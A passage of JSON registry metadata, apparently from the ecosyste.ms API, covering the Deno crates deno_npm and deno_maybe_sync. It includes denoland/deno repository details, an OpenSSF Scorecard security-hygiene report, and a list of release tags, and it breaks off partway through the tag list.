/api/v1/registries/crates.io/packages/deno_npm/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2023-04-06T15:06:46.432Z","updated_at":"2023-04-06T15:06:46.432Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T21:41:11.276Z","updated_at":"2023-07-18T21:41:11.276Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":12022793,"name":"deno_maybe_sync","ecosystem":"cargo","description":"Optionally sync structures for Deno crates","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":46,"first_release_published_at":"2025-08-19T20:04:49.552Z","latest_release_published_at":"2026-08-27T15:19:24.883Z","latest_release_number":"0.45.0","last_synced_at":"2026-09-07T22:55:16.818Z","created_at":"2025-08-19T20:18:56.310Z","updated_at":"2026-09-07T22:55:16.819Z","registry_url":"https://crates.io/crates/deno_maybe_sync/","install_command":"cargo install deno_maybe_sync","documentation_url":"https://docs.rs/deno_maybe_sync/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste